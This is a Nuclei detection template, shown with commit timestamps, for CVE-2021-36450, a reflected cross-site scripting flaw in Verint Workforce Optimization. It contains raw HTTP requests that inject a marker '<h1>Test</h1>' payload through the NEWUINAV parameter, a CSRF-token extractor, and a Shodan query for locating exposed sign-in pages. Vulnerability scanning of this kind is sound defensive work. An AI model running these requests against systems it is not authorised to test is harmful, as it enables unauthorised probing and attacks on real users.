nuclei-templates/http/cves/2021/CVE-2021-36450.yaml

71 lines
2.2 KiB
YAML
Raw Normal View History

2022-07-14 02:37:09 +00:00
id: CVE-2021-36450
info:
name: Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting
2022-07-14 02:37:09 +00:00
author: atomiczsec
severity: medium
description: Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest security patch or upgrade to a non-vulnerable version of Verint Workforce Optimization.
2022-07-14 02:37:09 +00:00
reference:
- https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740
- https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html
- http://verint.com
- https://nvd.nist.gov/vuln/detail/CVE-2021-36450
2022-07-14 02:37:09 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-07-14 02:37:09 +00:00
cve-id: CVE-2021-36450
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00468
2023-08-31 11:46:18 +00:00
epss-percentile: 0.72463
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:verint:workforce_optimization:15.2.8.10048:*:*:*:*:*:*:*
2022-07-14 08:29:41 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: verint
product: workforce_optimization
2023-09-06 12:09:01 +00:00
shodan-query: title:"Verint Sign-in"
2022-07-14 07:57:13 +00:00
tags: cve,cve2021,xss,verint
2022-07-14 02:37:09 +00:00
http:
2022-07-14 02:37:09 +00:00
- raw:
2022-07-14 07:57:13 +00:00
- |
GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1
2022-07-14 02:37:09 +00:00
Host: {{Hostname}}
2022-07-14 07:57:13 +00:00
- |
POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1
Host: {{Hostname}}
2022-07-14 02:37:09 +00:00
Content-Type: application/x-www-form-urlencoded
2022-07-14 07:57:13 +00:00
browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}
2023-07-11 19:49:27 +00:00
cookie-reuse: true
host-redirects: true
2022-07-14 07:57:13 +00:00
max-redirects: 2
2022-07-14 08:29:41 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><h1>Test</h1>26" class="loginUserNameText'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
2023-07-11 19:49:27 +00:00
extractors:
- type: regex
name: csrfp_login
group: 1
regex:
- 'csrfp_login=([a-zA-Z0-9]+);'
internal: true
part: header